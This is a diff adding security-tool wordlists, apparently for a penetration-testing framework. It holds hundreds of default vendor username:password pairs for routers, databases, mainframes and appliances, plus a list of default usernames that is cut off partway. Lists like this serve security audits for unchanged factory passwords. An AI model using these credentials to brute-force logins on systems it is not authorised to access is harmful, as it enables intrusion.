+sysadm:anicust +Administrator:Administrator +netrangr:attack +:Intel +:12345 +readwrite:lucenttech1 +:secret +piranha:piranha +wlse:wlsedb +admin:cisco +l3:l3 +admin:diamond +none:admin +naadmin:naadmin +public:public +admin:1988 +admin:radius +admin:root +NETOP: +Administrator:letmein +HELLO:MANAGER.SYS +:raidzone +:3ascotel +MANAGER:HPOFFICE +demo:demo +:166816 +User:Password +admin:zoomadsl +D-Link:D-Link +user:public +user:pass +l2:l2 +MGR:CCC +rw:rw +cgadmin:cgadmin +storwatch:specialist +:secure +vcr:NetVCR +OPERATOR:COGNOS +piranha:q +admin:synnet +MDaemon:MServer +root:cms500 +root:davox +jagadmin: +enquiry:enquirypw +at4400:at4400 +support:h179350 +davox:davox +admin:asd +PFCUser:240653C9467E45 +setup:changeme +superuser:superuser +:atc123 +aaa: +root:admin_1 +:266344 +MGR:WORD +topicalt:password +admin2:changeme +1234:1234 +MANAGER:ITF3000 +:connect +FIELD:HPONLY +nms:nmspw +client:client +admin:comcomcom +:speedxess +MGR:ROBELLE +:epicrouter +sys:uplink +OPERATOR:SYSTEM +field:support +MGR:SYS +root:letacla +:FORCE: +deskman:changeme +MAIL:REMOTE +SYSADM:sysadm +superadmin:secret +:backdoor +pmd: +MGR:CNAS +admin:22222 +GEN2:gen2 +:medion +ADMN:admn +Factory:56789 +PRODDTA:PRODDTA +tellabs:tellabs#1 +spcl:0 +dadmin:dadmin01 +:comcomcom +administrator:password +helpdesk:OCS +dhs3mt:dhs3mt +MGR:SECURITY +setup:changeme! +install:llatsni +adfexc:adfexc +IntraSwitch:Asante +manage:!manage +superman:21241036 +MANAGER:TELESUP +craft:crftpw +login:0 +:help +MGR:HPOFFICE +:lantronix +SPOOLMAN:HPOFFICE +manager:admin +:netadmin +ADVMAIL:HP +FIELD:SUPPORT +MANAGER:SYS +MGR:VESOFT +vt100:public +PSEAdmin:$secure$ +HELLO:OP.OPERATOR +Manager:friend +:hs7mwxkk +patrol:patrol +:SUPER +:SMDR +:1064 +teacher:password +PCUSER:SYS +MGR:ITF3000 +Any:12345 +OPERATOR:DISC +RSBCMON:SYS +cellit:cellit +MGR:INTX3 +inads:inads +halt:tlah +root:wyse +locate:locatepw +admin:visual +TMAR#HWMT8007079: +rapport:r@p8p0r+ +MGR:TELESUP +xbox:xbox +:TENmanUFactOryPOWER +device:device +NICONEX:NICONEX +admin:admin1234 +root:fivranne +acc:acc +31994:31994 +admin:netadmin +bcim:bcimpw +websecadm:changeme +blue:bluepw +topicnorm:password +supervisor:PlsChgMe +:R1QTPS +MGR:HPONLY +ccrusr:ccrusr +root:Cisco +login:password +266344:266344 +MAIL:MPE +telecom:telecom +MAIL:HPOFFICE +GEN1:gen1 +Administrator:smcadmin +SSA:SSA +:snmp-Trap +HTTP:HTTP +:default +mtch:mtch +admin:adslolitec +Administrator:ganteng +bciim:bciimpw +browse:browsepw +Admin:Admin +:Password +hydrasna: +sys:change_on_install +deskres:password +bbsd-client:changeme2 +anonymous:Exabyte +admin:rmnetlm +replicator:replicator +intel:intel +OPERATOR:SUPPORT +MGR:HPP196 +radware:radware +intermec:intermec +mlusr:mlusr +MGR:RJE +FIELD:LOTUS +init:initpw +e250:e250changeme +MAIL:TELESUP +Polycom:SpIp +temp1:password +:adminttd +tech:field +support:supportpw +mac: +:MiniAP +MANAGER:SECURITY +3comcso:RIP000 +RMUser1:password +WP:HPOFFICE +Administrator:changeme +MGR:XLSERVER +MGR:HPP187 +MGR:HPP189 +inads:indspw +admin:linga +craft:craft +:enter +NAU:NAU +rcust:rcustpw +admin:AitbISP4eCiG +mtcl:mtcl +MGR:CONV +topicres:password +bcnas:bcnaspw +MGR:NETBASE +admin:access +public: +adminuser:OCS +MGR:REGO +Root: +cac_admin:cacadmin +mediator:mediator +superman:talent +Anonymous: +kermit:kermit +admin:x-admin +MGR:HPDESK +:9999 +root:ROOT500 +admin:my_DEMARC +volition:volition +GlobalAdmin:GlobalAdmin +:4getme2 +LUCENT01:UI-PSWD-01 +admin:2222 +LUCENT02:UI-PSWD-02 +MANAGER:TCH +adminstat:OCS +desknorm:password +IntraStack:Asante +OPERATOR:SYS +MGR:COGNOS +:Fireport +:ILMI +maint:maintpw +supervisor:supervisor +e500:e500changeme +admin:mu +MANAGER:COGNOS +deskalt:password +admin:OCS +bbsd-client:NULL +cust:custpw +admin:noway +tiara:tiaranet +bcms:bcmspw +:TANDBERG +m1122:m1122 +telco:telco +superuser: +xd:xd +dhs3pms:dhs3pms +VNC:winterm +craft:craftpw +maint:rwmaint +anonymous:any@ +login:access +browse:looker +customer:none +cisco:cisco +adminstrator:changeme +FIELD:MANAGER +:1234admin +FIELD:MGR +ftp_nmc:tuxalize +me: +iclock:timely +echo:User +ADVMAIL:HPOFFICE:DATA +login:1111 +login:8429 +Administrator:manage +:Babylon +admin:hagpolm1 +root:12345 +scmadmin:scmchangeme +user:tivonpw +sysadm:Admin +Administrator:password +admin:administrator +installer:installer +webadmin:webadmin +ftp_inst:pbxk1064 +DDIC:19920706 +:pento +admin:NetSurvibox +SYSTEM:D_SYSTPW +draytek:1234 +:3477 +operator:$chwarzepumpe +administrator:asecret +EARLYWATCH:SUPPORT +:10023 +Manager:Admin +super.super: +ftp_oper:help1954 +corecess:corecess +superuser:123456 +admin:Password +super.super:master +admin:Protector +SYSTEM:MANAGER +webadmin:1234 +install:secret +FIELD:HPWORD:PUB +admin:12345 +admin:symbol +weblogic:weblogic +Admin:1988 +system/manager:sys/change_on_install +root:3ep5w2u +:8111 +:jannie +End:User:123 +none:0 +d.e.b.u.g:User +admin:tomcat +target:password +Administrator:pilou +MD110:help +Administrator:3ware +:ANYCOM +tiger:tiger123 +adminttd:adminttd +admin:asante +admin:smallbusiness +admin:netscreen +FIELD:HPP187:SYS +guest:User +maint:ntacdmax +admin:w2402 +wlseuser:wlsepassword +SAPCPIC:admin +ftp_admi:kilo1987 +admin:articon +mtcl: +default.password: +admin:michelangelo +manager:changeme +root:Mau'dib +:Serial:Num +root:ggdaseuaimhrke +7:maintain +2:syslib +ADMIN:admin +system:weblogic +Administrator:ggdaseuaimhrke +ADMIN: +itsadmin:init +PUBSUB:PUBSUB +admin:demo +system:manager +sys:sys +CTXSYS:CTXSYS +ftp: +bill:bill +192.168.1.1:60020:@dsl_xilno +FIELD: +admin:dmr99 +setpriv:system +GUEST:GUEST +SAP*:06071992 +operator:1234 +t3admin:Trintech +hello:hello +supervisor: +CISCO15:otbu+1 +1.79:Multi +:babbit +mso:w0rkplac3rul3s +Telecom:Telecom +qsysopr:qsysopr +admin:TANDBERG +admin:imss7.0 +:nokia +APPS:APPS +Developer:isdev +mail:mail +admin:draadloos +qsecofr:qsecofr +11111:x-admin +:default.password +Service:5678 +enable:cisco +netadmin:nimdaten +Polycom:456 +admin:P@55w0rd! +admin:1234admin +root:par0t +any:system +db2fenc1:db2fenc1 +johnson:control +2:maintain +isp:isp +demos: +QSRV:QSRV +root:iDirect +MDSYS:MDSYS +Admin:123456 +2:manager +vpasp:vpasp +TEST:TEST +:Telecom +QSECOFR:QSECOFR +adm:none +:2501 +1:syslib +system:security +admin:leviton +!root:blank +informix:informix +root:mpegvideo +5:games +root:0P3N +engmode:hawk201 +scout:scout +qpgmr:qpgmr +admin:admin000 +ADSL:expert03 +cisco: +images:images +admin:security +admin:surecom +Gearguy:Geardog +:symantec +comcast: +admin:adslroot +1:manager +Demo: +:xyzzy +Administrator:adaptec +system:system +SAP*:PASS +serial#:serial# +BACKUP:BACKUP +stratacom:stratauser +root:rootme +6.x: +root:!root +webadmin:webibm +:riverhead +mary:password +COMPANY:COMPANY +SYS:SYS +DSL:DSL +Jetform: +none:amber +eagle:eagle +ROUTER: +root:brightmail +admin:pass +:HEWITT:RAND +ods:ods +siteadmin:toplayer +admin:OkiLAN +root:rootpass +Alphanetworks:wrgg15_di524 +:x40rocks +:nokai +Admin1:Admin1 +field:field +Admin:admin +Admin:ImageFolio +:iolan +:manager +admin:pfsense +janta:sales:janta211 +servlet:manager +username:password +citel:password +Replicator:iscopy +SYSMAN:OEM_TEMP +1:operator +SYSTEM:SYSTEM +administrator:RSAAppliance +master:themaster01 +Admin:1234 +2:operator +SUPERUSER:ANS#150 +admin:passwort +cn=orcladmin:welcome +30:games +maintainer:admin +setup: +:hello +admin:NetSeq +BRIO_ADMIN:BRIO_ADMIN +:citel +internal:oracle +CQSCHEMAUSER:PASSWORD +root:kn1TG7psLu +SYS:SYSPASS +:lkwpeter +DEV2000_DEMOS:DEV2000_DEMOS +FSFTASK1: +checkfs:checkfs +BACKUP: +USER1:USER1 +root:TENmanUFactOryPOWER +SQLDBA: +root:resumix +HELP:HELP +toor:logapp +SYS:0RACLE9 +SYS:0RACLE8 +:57gbzb +!root:none +qsrvbas:qsrvbas +SYSADMIN: +EZsetup: +Administrator:1234 +:sldkj754 +BATCH: +STRAT_USER:STRAT_PASSWD +Administrator:19750407 +:User +user:USERP +primenet:primeos +OEMREP:OEMREP +admin:[^_^] +USER6:USER6 +lynx: +:TTPTHA +powerdown:powerdown +root:Mau’dib +SYSTEM:ORACL3 +$ALOC$: +password: +VOL-0215: +admin:nimda +tomcat:tomcat +REP_MANAGER:DEMO +WinCCConnect:2WSXcder +ALLIN1:ALLIN1 +DIRMAINT: +eqadmin::Serial:port:only:equalizer +sysadm:sysadmpw +QSRVBAS:QSRVBAS +admin:ip305Beheer +debug:tech +:ACCORD +AQJAVA:AQJAVA +LASERWRITER:LASERWRITER +Administrator:0000 +root:nsi +PERFSTAT:PERFSTAT +apcuser:apc +MBWATCH:MBWATCH +:protection +system_admin: +unix:unix +OWNER:OWNER +NETPRIV:NETPRIV +VSEMAINT: +:AWARD?SW +DEMO:DEMO +tomcat:changethis +SYMPA:SYMPA +REP_OWNER:REP_OWNER +DCL:DCL +FAX: +root:dbps +ARCHIVIST:ARCHIVIST +USER:PASSWORD +VTAMUSER: +LASERWRITER: +VMTAPE: +basisk:basisk +NetLinx:password +OutOfBox:demos:guest:4DGifts:(none:by:default) +none:letmein +NETMGR:NETMGR +DEFAULT:USER +OAS_PUBLIC:OAS_PUBLIC +read: +AP:AP +demos:demos +SYSTEM:Admin +admin:j5Brn9 +MTSSYS:MTSSYS +SYSMAINT:DIGITAL +AUDIOUSER:AUDIOUSER +Joe:hello +IDMS: +:teX1 +admin:allot +$SRV:$SRV +snake: +SYS:0RACLE +ADVMAIL: +Administrator:nicecti +ROOT:ROOT +PRINTER:PRINTER +shutdown: +satan: +:m1link +RDM470: +master:access +:l2 +:l1 +trouble:trouble +fax: +OP1: +admin@example.com:admin +root:trendimsa1.0 +HOST:HOST +ADLDEMO:ADLDEMO +QS_ADM:QS_ADM +bin:sys +:AMI +OPER:OPER +oracle: +jj: +PO7:PO7 +SYSTEM:0RACLE8 +SYSTEM:0RACLE9 +www: +joe:password +:komprie +:123 +MAINT:MAINT +CMSBATCH: +root:toor +CCC: +role1:tomcat +DATAMOVE: +lp: +:AMISETUP +:sp99dd +halt:halt +MSHOME:MSHOME +ISPVM: +crowd­-openid-­server:password +user_editor:demo +sedacm:secacm +ROOT: +Admin:3Com +db2admin:db2admin +Airaya:Airaya +supervisor:visor +none:Wireless +SYSDUMP1: +IMEDIA:IMEDIA +:Biostar +install:install +primos_cs:primos +admin:infrant1 +Administrator:Partner +:Administrative +USER_TEMPLATE:USER_TEMPLATE +pnadmin:pnadmin +:h6BB +lpadmin:lpadmin +guest:none +VTAM:VTAM +TRACESVR:TRACE +POSTMASTER:POSTMASTER +MAILER:MAILER +RSCSV2: +QS_WS:QS_WS +:sma +system_admin:system_admin +circ: +Demo:password +:rwa +nobody:nobody +Tasman:Tasmannet +admin:!admin +DISCOVERER_ADMIN:DISCOVERER_ADMIN +VMASMON: +LR-ISDN:LR-ISDN +TURBINE:TURBINE +GL:GL +PO:PO +:AMI_SW +super:superpass +PRINT: +MODTEST:YES +GATEWAY:GATEWAY +root:system +PRIMARY:PRIMARY +both:tomcat +:award.sw +haasadm:lucy99 +pw:pwpw +games:games +DOCSIS_APP:3Com +bbs: +EMP:EMP +Admin:cclfb +postmaster: +SITEMINDER:SITEMINDER +Any:Any +vgnadmin:vgnadmin +RJE:RJE +gonzo: +NEWS:NEWS +sa:Ektron +:Award +AQUSER:AQUSER +UTLBSTATU:UTLESTAT +:AMIAMI +netbotz:netbotz +CTXSYS:CHANGE_ON_INSTALL +xmi_demo:sap123 +:Crystal +:Daewuu +ftp:ftp +ORACACHE:(random:password) +MCUser:MCUser1 +prash:hello +sync: +sysadm:admpw +root:rootadmin +PM:PM +AP2SVP: +master:master +ibm:2222 +ULTIMATE:ULTIMATE +SABRE: +role1:role1 +user_pricer:demo +admin:enhydra +SUPERVISOR:NF +EVENT:EVENT +:xyzall +:rainbow +ADMIN:JETSPEED +SYS:ORACL3 +PORTAL30_SSO_PS:PORTAL30_SSO_PS +FSFADMIN: +OO:OO +WKSYS:WKSYS +OPERATNS:OPERATNS +:ksdjfg934t +UVPIM_: +:merlin +OE:OE +Any:Local:User:Local:User:password +OCITEST:OCITEST +web: +:HLT +ADMINISTRATOR:admin +ESSEX: +:last +CTXSYS: +None:xyzzy +CTXDEMO:CTXDEMO +user_designer:demo +:Admin +:zebra +QDBA:QDBA +role:changethis +LRISDN:LRISDN +tele:tele +WEBCAL01:WEBCAL01 +rsadmin:rsadmin +OMWB_EMULATION:ORACLE +root:alien +WINDOWS_PASSTHRU: +:sanfran +public:ReadOnly:access:secret +:AMIPSWD +MOREAU:MOREAU +fast:abd234 +root:QNX +host:dnnhost +administrator:root +admin:public +SYSTEM:ORACLE +:sertafu +ORDPLUGINS:ORDPLUGINS +SYSWRM: +mail: +:telos +ADMIN:ADMIN +administrator:adminpass +savelogs:crash +:ACCESS +SDOS_ICSAP:SDOS_ICSAP +system:adminpwd +BATCH:BATCH +GUEST:GUESTGUEST +SYSMAINT:SYSMAINT +postmaster:postmast +DSSYS:DSSYS +:award_ps +:ZAAADA +MGWUSER:MGWUSER +:NTCIP +OPERATOR: +:hewlpack +TDOS_ICSAP:TDOS_ICSAP +ssp:ssp +EJSADMIN:EJSADMIN +:damin +INGRES:INGRES +DS: +:A.M.I +estheralastruey: +:1322222 +VCSRV:VCSRV +Administrator:storageserver +ssladmin:ssladmin +CLARK:CLOTH +shutdown:shutdown +administrator:1234 +OEMADM:OEMADM +restoreonly:restoreonly1 +quser:quser +PRINTER: +MILLER:MILLER +trmcnfg:trmcnfg +REPORT:REPORT +user_author:demo +:aLLy +dpn:changeme +tour:tour +mountfsys:mountfsys +http: +PROG:PROG +:iwill +openfiler:password +:Public +admin:mp3mystic +RAID:hpt +read:synnet +admin:peribit +STARTER:STARTER +FAXUSER: +GUEST:GUESTGUE +DSA: +:guardone +daemon:daemon +mountsys:mountsys +SYSTEM:ORACLE9 +SYSTEM:ORACLE8 +:gandalf +backuponly:backuponly1 +IVPM1: +:leaves +sysadm:syspw +root:blablabla +:Compleri +USER3:USER3 +OPENSPIRIT:OPENSPIRIT +:spooml +:changeit +:wg +prime:primeos +HPLASER: +:Vextrex +CSPUSER: +qsvr:qsvr +lynx:lynx +SYSCKP: +root:letmein +Sysop:Sysop +user_marketer:demo +IMAGEUSER:IMAGEUSER +root:Password +bsxuser:bsxpass +MASTER:PASSWORD +USER9:USER9 +root:ax400 +OLAPSYS:MANAGER +SYSTEM:OPERATOR +oracle:oracle +root:Mau?dib +:MASTER +root:t00lk1t +rsadmin: +:Daytec +OutOfBox: +:SZYX +:cmaker +:CTX_123 +rje:rje +ODM_MTR:MTRPW +QS_ES:QS_ES +lansweeperuser:mysecretpassword0* +DEMO3: +Username:password +GPLD:GPLD +uucp:uucp +DBSNMP:DBSNMP +VMARCH: +GUEST:TSEUG +SWUSER:SWUSER +root:8RttoTriz +VTAM: +OPERATNS: +Operator:Operator +CHEY_ARCHSVR: +SYS:ORACLE +roo:honey +n.a:guardone +accounting:accounting +backuprestore:backuprestore1 +PRINT:PRINT +:j322 +:Craftr4 +dni:dni +WEBADM:password +iceman: +guru:*3noguru +FAX:FAX +anon:anon +:j256 +USER8:USER8 +root:honey +PORTAL30_SSO_PUBLIC:PORTAL30_SSO_PUBLIC +:589721 +postgres: +WINSABRE:WINSABRE +USERP:USERP +none:public +Admin:shs +SYS:MANAGER +IVPM2: +PORTAL30_SSO:PORTAL30_SSO +ALLIN1MAIL:ALLIN1MAIL +POST: +TEMP: +:xo11nE +admin:nms +SYSADM:SYSADM +BATCH1: +me:me +SUPERVISOR:NFI +PROMAIL: +SECDEMO:SECDEMO +ARAdmin:AR#Admin# +sadmin: +ORAREGSYS:ORAREGSYS +VMASSYS: +man: +FROSTY:SNOWMAN +LASER:LASER +tutor: +:?award +root:changethis +DISKCNT: +default:WLAN_AP +SYSERR: +WWW:WWW +VAX:VAX +none:none +:Cable-docsis +PROCAL: +SUPERVISOR:SYSTEM +FAXWORKS: +ibm:password +CTXSYS:UNKNOWN +LDAP_Anonymous:LdapPassword_1 +(any:3:chars):cascade +games: +User:1234 +:Zenith +setup/snmp:setup/nopasswd +DSGATEWAY:DSGATEWAY +AWARD_SW: +CSMIG:CSMIG +:year2000 +umountfsys:umountfsys +:BIGO +root:jstwo +VMS:VMS +dni: +bpel:bpel +viewuser:viewuser1 +admin:ISPMODE +TDISK: +politically:correct +user_analyst:demo +admin:conexant +guest:1234 +root:logapp +admin:ip3000 +RSCS: +COMPIERE:COMPIERE +OSP22:OSP22 +guest1:guest1 +FORSE:FORSE +:lesarotl +factory:factory +bubba:(unknown) +admin:ip20 +admin:ip21 +LASER: +QUSER:QUSER +:AWARD:SW +primeos:prime +admin:tr650 +poll:poll +:j262 +:xljlbj +glftpd:glftpd +:Advance +RMAN:RMAN +mountfs:mountfs +DIRECT: +:console +firstsite:firstsite +:SW_AWARD +IPFSERV: +:snake +Administrator:Gateway +TSUSER:TSUSER +BATCH2: +admin:123123 +:3098z +:cc +snmp:nopasswd +WebAdmin:WebBoard +IBMUSER:SYS1 +SMART: +voadmin:manager +BC4J:BC4J +core:phpreactor +OPERVAX:OPERVAX +Bobo:hello +:Congress +:central +WANGTEK:WANGTEK +disttech:etas +OWA:OWA +USER2:USER2 +jasperadmin:jasperadmin +FIELD:DIGITAL +root:uClinux +guest:guestgue +FAXUSER:FAXUSER +WINSABRE:SABRE +VMBSYSAD: +admin:ip400 +PVM: +ctb_admin:sap123 +:AMI.KEY +:AMI.KEZ + :ANYCOM +USER_TEMPLATE: +DEMO4: +:inuvik49 +QSRV:11111111 +qsrv:qsrv +superdba:admin +PORTAL30:PORTAL31 +PORTAL30:PORTAL30 +XPRT:XPRT +Crowd:password +User:19750407 +18364: +:zjaaadc +ilom-admin:ilom-admin +rdc123:rdc123 +sysopr:sysopr +tasman:tasmannet +SYSTEM:0RACLE8I +:Cisco:router +admin:store +:SER +blank:blank +ADMIN:PASSWORD +admin:IP:address +WEBREAD:WEBREAD +ODM:ODM +11111111:11111111 +prime:prime +AURORA$ORB$UNAUTHENTICATED:INVALID +ADAMS:WOOD +root:vertex25 +sys:bin +lp:lineprin +Craft:crftpw +www:www +postgres:dbpass +rfmngr:$rfmngr$ +sync:sync +WANGTEK: +:1988 +MAINT: +SYSTEST_CLIG:SYSTEST +user:user0000 +user_approver:demo +ilom-operator:ilom-operator +Nice-admin:nicecti +:HELGA-S +answer: +NETNONPRIV:NETNONPRIV +nuucp: +CIDS:CIDS +VASTEST: +primenet:primenet +redline:redline +:rw +spcl:0000 +admin:muze +MBMANAGER:MBMANAGER +webmaster: +APPLSYS:FND +:ro +WINDOWS_PASSTHRU:WINDOWS_PASSTHRU +USER4:USER4 +hqadmin:hqadmin +UOMNI_: +FIELD:TEST +sys:system +Admin:123qwe +VMUTIL: +POST:BASE +:dn_04rjc +uucpadm:uucpadm +halt: +FAXWORKS:FAXWORKS +admin:password1 +EXFSYS:EXFSYS +4Dgifts: +JMUSER:JMUSER +admin:imsa7.0 +SUPERVISOR:NETFRAME +CIS:CIS +UNITY_: +:ciscofw +HLW:HLW +admin:brocade1 +pwrchute:pwrchute +:setup +:Tiny +IDMSSE: +postgres:svcPASS83 +NSA:nsa +!root:!ishtar +admin:blank +root:NeXT +TELEDEMO:TELEDEMO +:AMIDECOD +recover:recover +TRAVEL:TRAVEL +lexar: +:efmukl +viewer: +LIBRARY: +admin:raritan +PO8:PO8 +root@localhost:root +NAMES:NAMES +secofr:secofr +PDMREMI: +:biostar +MGE:VESOFT +USER7:USER7 +OWA_PUBLIC:OWA_PUBLIC +questra:questra +builtin:builtin +SFCNTRL: +SAP*:6071992 +boss:boss +anonymous:password +:isolation +:Q54arwms +PLEX:PLEX +OLAPDBA:OLAPDBA +:g6PJ +OLAPSVR:INSTANCE +user_expert:demo +root:pixmet2003 +Bhosda:Lund +TEST: +qsvr:ibmcel +CMSBATCH:CMSBATCH +:ABCD +gropher: +:AM +administrator:admin +:condo +:Toshiba +:familymacintosh +TAHITI:TAHITI +NEWINGRES:NEWINGRES +:AMI?SW +:mMmM +man:man +VM3812: +root:powerapp +ibm:service +VIF_DEVELOPER:VIF_DEV_PWD +ADMIN:WELCOME +Admin:Barricade +joeuser:joeuser +system:isp +IPC: +HELPDESK:HELPDESK +wlpisystem:wlpisystem +TSAFVM: +prtgadmin:prtgadmin +SYSTEM:CHANGE_ON_INSTALL +:CONCAT +:t0ch88 +webmaster:webmaster +:djonet +ADMIN:changeme +Any: +:Compaq +UAMIS_: +theman:changeit +CISINFO:CISINFO +mobile:dottie +QS_CB:QS_CB +CDEMORID:CDEMORID +tech:nician +DEMO2: +administrator:none +SYS:MANAG3R +End:User:7936 +PORTAL30_PUBLIC:PORTAL30_PUBLIC +sysadmin:nortel +SYS:D_SYSTPW +SYSTEM:SYSPASS +Guest:blank +User:User +MDDEMO_CLERK:CLERK +FIELD:FIELD +Admin:SECRET123 +Guest:Guest +PHANTOM: +admin:amigosw1 +:xmux +write: +ADMINISTRATOR:SENTINEL +system:field +:ducati900ss +qsecofr:22222222 +:lkw:peter +:awkward +:TzqF +SYSTEST_CLIG:SYSTEST_CLIG +ODS:ODS +admin:axis2 +BLAKE:PAPER +TSDEV:TSDEV +PRODBM: +admin:letmein +:joh316 +dos:dos +login:0000 +APL2PP: +system:hdms +admin:phplist +god1:12345 +admin:novell +CICSUSER:CISSUS +22222222:22222222 +root:passw0rd +user_publisher:demo +OSE$HTTP$ADMIN:(random:password) +def:trade +SuperUser:kronites +QS_CBADM:QS_CBADM +SYSA:SYSA +:00000000 +STUDENT:STUDENT +Draytek:1234 +SMDR:SECONDARY +EREP: +VSEMAN: +:OOOOOOOO +primos_cs:prime +demo: +fwadmin:xceladmin +:j64 +MTS_USER:MTS_PASSWORD +:AWARD_SW +AQDEMO:AQDEMO +private:ReadWrite:access:secret +:GWrv +:MagiMFP +:SnuFG5 +IS_$hostname:IS_$hostname +HPSupport:badg3r5 +ORASSO:ORASSO +GATEWAY: +:t0ch20x +CVIEW: +SH:SH +:zeosx +XXSESS_MGRYY:X#1833 +:wodj +:FOOBAR +SYSMAN:SYSMAN +VMMAP: +admin:urchin +PORTAL30_DEMO:PORTAL30_DEMO +Ezsetup: +QS_CS:QS_CS +administrator:PlsChgMe! +CMSUSER: +:MCUrv +DEMO1: +admin:adminadmin +userNotUsed:userNotU +:AMI~ +root:ibm +ncadmin:ncadmin +TESTPILOT:TESTPILOT +:Polrty +fg_sysadmin:password +UETP:UETP +QS:QS +DBI:MUMBLEFRATZ + :ILMI +SYSTEM:SYS +JWARD:AIROPLANE +APPS_MRC:APPS_MRC +:uboot +Moe:hello +SENTINEL:SENTINEL +admin:netgear1 +Yak:asd123 +PDP11:PDP11 +:aammii +Flo:hello +SLIDE:SLIDEPW +root:bagabu +primeos:primeos +:Spacve +:256256 +INFO:INFO +checkfsys:checkfsys +PRODCICS:PRODCICS +:foolproof +:AWARD_PW +MXAGENT:MXAGENT +SYSTEM:ORACLE8I +admin:no:password +VMTLIBR: +POWERCARTUSER:POWERCARTUSER +VMBACKUP: +CPNUC: +:QDI +:shiva +distrib:distrib0 +SUPERVISOR:SUPERVISOR +SYSMAINT:SERVICE +MIGRATE:MIGRATE +CDEMOUCB:CDEMOUCB +system:prime +QSRV:22222222 +:c +OLTSEP: +sysbin:sysbin +signa:signa +autocad:autocad +:SWITCHES_SW +WEBDB:WEBDB +daemon: +:aPAf +ncrm:ncrm +SAMPLE:SAMPLE +:1 +HCPARK:HCPARK +ALLINONE:ALLINONE +nm2user:nm2user +SAVSYS: +IIPS: +PATROL:PATROL +:technolgi +:MBIU0 +mailadmin:secret +adm:adm +TMSADM: +tutor:tutor +ESubscriber: +CHEY_ARCHSVR:CHEY_ARCHSVR +write:synnet +software:software +admin:welcome +god2:12345 +bbs:bbs +:Dell +disttech:disttech +FSFTASK2: +:zbaaaca +:prost +ORDSYS:ORDSYS +Administrator:administrator +:1234567890 +gopher:gopher +PSFMAINT: +SYSTEM:MANAG3R +:RM +:s!a@m#n$p%c +EAdmin: +12345:12345 +DECNET:DECNET +OPERATIONS:OPERATIONS +$system: +REP_OWNER:DEMO +PANAMA:PANAMA +LIBRARIAN:SHELVES +SYSTEM:0RACLE +fal: +4Dgifts:4Dgifts +:biosstar +NETSERVER:NETSERVER +:tiny +root:TANDBERG +POWERCHUTE:APC +USER5:USER5 +GPFD:GPFD +:12345678 +blank:admin +QS_OS:QS_OS +sysadm:admin +REPADMIN:REPADMIN +Administrator:12345678 +0:0 +DEMO8:DEMO8 +DEMO9:DEMO9 +CDEMO82:CDEMO82 +admin:boca:raton +Administrator:vision2 +administrator:0 +umountsys:umountsys +snmp:snmp +Username:PASSWORD +volition: +USER0:USER0 +CDEMOCOR:CDEMOCOR +SYSTEST:UETP +Rodopi:Rodopi +DECNET:NONPRIV +user_checker:demo +:tatercounter2000 +qserv:qserv +:ESSEX:or:IPC +AQ:AQ +support: +SAPR3:SAP +VRR1:VRR1 +fastwire:fw +admi:admin +FINANCE:FINANCE +WinCCAdmin:2WSXcder +ESTOREUSER:ESTORE +fax:fax +VIRUSER:VIRUSER +LINK:LINK +APPLSYSPUB:FNDPUB +:BIOS +SYS:ORACLE8 +SYS:ORACLE9 +overseer:overseer +checksys:checksys +umountfs:umountfs +DBDCCICS:DBDCCIC +Admin:password +:x6zynd56 +TOAD:TOAD +root:mozart +ntpupdate:ntpupdate +root:router +MDDEMO_MGR:MGR +ARCHIVIST: +SUPERVISOR:HARRIS +:11111 +billy-bob: +lp:bin +DECMAIL:DECMAIL +alien:alien +admin:dnnadmin +nsroot:nsroot +AdvWebadmin:advcomm500349 +dvstation:dvst10n +SERVICECONSUMER1:SERVICECONSUMER1 +MMO2:MMO2 +qsecofr:11111111 +NOC:NOC +WWWUSER:WWWUSER +root::Serial:port:only: +SAP:SAPR3 +root:t0talc0ntr0l4! +NEVIEW: +MAIL: +ODSCOMMON:ODSCOMMON +fal:fal +pixadmin:pixadmin +ripeop: +PENG: +:BIOSPASS +netlink:netlink +L2LDEMO:L2LDEMO +OUTLN:OUTLN +12.x: +scott:tiger:or:tigger +:toshy99 +dbase:dbase +:nz0u4bbe +fam:fam +:bell9 +Oper:Oper +RMAIL:RMAIL +administrator:19750407 +FND:FND +admin:exinda +PRIV:PRIV +admin:barney +SETUP: +:biodata +:24Banc81 +news:news +VSEIPO: +:j09F +pw:pw +GUEST: +ilon:ilon +:award_? +SYS:0RACLE39 +SYS:0RACLE38 +DEFAULT:DEFAULT +:AMI!SW +PLSQL:SUPERSECRET +root:alpine +politcally:correct +18140815:18140815 +APPUSER:APPUSER +SUPERVISOR: +CENTRA:CENTRA +LBACSYS:LBACSYS +:alfarome +PDP8:PDP8 +SFCMI: +administrator:*:*:# +lpadm:lpadm +Test:Everything: +bewan:bewan +:2580 +DIP:DIP +:Sxyz +mfd:mfd +MDDEMO:MDDEMO +:intermec +:589589 +SWPRO:SWPRO +DES:DES +root:fibranne +Coco:hello +GCS: +rodopi:rodopi +:touchpwd= +Scott:Tiger +Admin5:4tugboat +admin:funkwerk +ANDY:SWORDFISH +DESQUETOP: +nobody: +Manager:657 +:mysweex +SYSTEM:SYSLIB +NETCON:NETCON +JONES:STEEL +author:author +MOESERV: +web:web +tech:User +PUBSUB1:PUBSUB1 +SYS:D_SYSPW +CATALOG:CATALOG +:IBM +:Guest +SQLUSER: +RE:RE +REPORTS_USER:OEM_TEMP +MFG:MFG +POST:POST +HPLASER:HPLASER +HR:HR +VIDEOUSER:VIDEO:USER +DBA:SQL +:CMOSPWD +guest1:guest +superuser:asante +SYSTEM:0RACLE38 +SYSTEM:0RACLE39 +AUTOLOG1: +dadmin:dadmin +AURORA$JIS$UTILITY$: +wlcsystem:wlcsystem +news: +CPRM: diff --git a/data/wordlists/default_users_for_services_unhash.txt b/data/wordlists/default_users_for_services_unhash.txt new file mode 100644 index 0000000000..c36f0e7e2b --- /dev/null +++ b/data/wordlists/default_users_for_services_unhash.txt @@ -0,0 +1,915 @@ +admin + +root +Administrator +sysadm +tech +operator +guest +security +debug +manager +service +!root +user +netman +super +diag +Cisco +Manager +DTA +apc +User +Admin +cablecom +adm +wradmin +netscreen +sa +setup +cmaker +enable +MICRO +login +write +monitor +netopia +op +adminview +sysadmin +echo +craft +maint +comcast +CSG +readonly +manuf +cusadmin +smc +sweex +disttech +su +poll +SYSDBA +anonymous +support +recovery +USERID +eng +administrator +NETWORK +JDE +Guest +rwa +USER +test +lp +ro +MAIL +ami +hsa +system +MGR +ADMINISTRATOR +FIELD +PBX +HELLO +hscroot +1502 +superuser +netrangr +readwrite +piranha +wlse +l3 +none +naadmin +public +NETOP +MANAGER +demo +D-Link +l2 +rw +cgadmin +storwatch +vcr +OPERATOR +MDaemon +jagadmin +enquiry +at4400 +davox 